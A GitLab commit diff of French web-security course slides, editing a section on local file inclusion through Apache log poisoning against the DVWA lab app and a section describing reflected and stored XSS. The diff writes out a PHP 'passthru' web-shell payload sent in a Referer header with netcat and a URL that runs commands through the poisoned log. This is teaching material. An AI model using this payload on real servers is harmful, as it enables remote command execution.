Skip to content
Snippets Groups Projects
Commit a20d62e0 authored by Vincent Mazenod's avatar Vincent Mazenod
Browse files

fix cours

parent 0c7661a6
Branches prez
No related tags found
No related merge requests found
Pipeline #6496 passed
...@@ -178,9 +178,7 @@ CustomLog /home/mazenovi/logs/dvwa-access.log combined ...@@ -178,9 +178,7 @@ CustomLog /home/mazenovi/logs/dvwa-access.log combined
* l'utilisateur lié au thread apache a accès en lecture à ce répertoire * l'utilisateur lié au thread apache a accès en lecture à ce répertoire
<small> [http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log](http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log)
[http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log](http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.lo)
</small>
* les logs sont affichés * les logs sont affichés
...@@ -201,15 +199,13 @@ $ nc dv.wa 80 ...@@ -201,15 +199,13 @@ $ nc dv.wa 80
* Entrer manuellement les paramètres suivant * Entrer manuellement les paramètres suivant
```http ```http
GET /<?php echo passthru($_GET['cmd']); ?> HTTP/1.1 GET / HTTP/1.1
Host: dv.wa Host: dv.wa
Referer: <?php echo passthru($_GET['cmd2']); ?> Referer: <?php echo passthru($_GET['cmd']); ?>
User-Agent: <?php echo passthru($_GET['cmd3']); ?> User-Agent: 1337-webbrowser
``` ```
<small>
[http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log&cmd=ls](http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log&cmd=ls) [http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log&cmd=ls](http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log&cmd=ls)
</small>
attendre le log rotate en cas d'échec attendre le log rotate en cas d'échec
......
...@@ -8,7 +8,8 @@ ...@@ -8,7 +8,8 @@
* Affichage de données utilisateur sans validation ou échappement * Affichage de données utilisateur sans validation ou échappement
* par oubli du développeur * par oubli du développeur
* par les messages d'erreurs renvoyés par le langage * par les messages d'erreurs renvoyés par le langage
* tentative d'injection de code interprétable par le navigateur de la cible
* tentative d'injection de code interprétable par le navigateur de la cible
### <i class="fa fa-user-secret"></i> Que peut on faire? ### <i class="fa fa-user-secret"></i> Que peut on faire?
...@@ -67,11 +68,11 @@ Note: ...@@ -67,11 +68,11 @@ Note:
![Bob](images/xss/XSS-bob.png "Bob") ![Fleche](images/xss/XSS-fleche.png "Fleche") ![Alice](images/xss/XSS-alice1.png "Alice") ![Bob](images/xss/XSS-bob.png "Bob") ![Fleche](images/xss/XSS-fleche.png "Fleche") ![Alice](images/xss/XSS-alice1.png "Alice")
3.Bob envoie l'url du XSS à Alice en l'incitant à cliquer sur un lien forgé **XSS réfléchie** 3.Bob envoie l'url du XSS à Alice en l'incitant à cliquer sur un lien forgé (**XSS réfléchie**)
ou ou
3.attend simplement qu'elle se connecte une page compromise **XSS stockée** 3.attend simplement qu'elle se connecte à une page compromise (**XSS stockée**)
Note: Note:
- test du XSS souvent alert ... méthode plus discrète notamment pour XSS stored - test du XSS souvent alert ... méthode plus discrète notamment pour XSS stored
...@@ -82,11 +83,11 @@ Note: ...@@ -82,11 +83,11 @@ Note:
![Alice](images/xss/XSS-alice2.png "Alice") ![Fleche](images/xss/XSS-fleche.png "Fleche") ![Site piégé](images/xss/XSS-sitepiege.png "Site piégé") ![Serveur victime](images/xss/XSS-serveurvictime.png "Serveur victime") ![Alice](images/xss/XSS-alice2.png "Alice") ![Fleche](images/xss/XSS-fleche.png "Fleche") ![Site piégé](images/xss/XSS-sitepiege.png "Site piégé") ![Serveur victime](images/xss/XSS-serveurvictime.png "Serveur victime")
4.Alice clique sur le lien forgé **XSS réfléchie** 4.Alice clique sur le lien forgé (**XSS réfléchie**)
ou ou
4.Alice consulte la page compromise et pense avoir à faire à l'originale **XSS stockée** 4.Alice consulte la page compromise et pense avoir à faire à l'originale (**XSS stockée**)
## XSS ## XSS
......
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment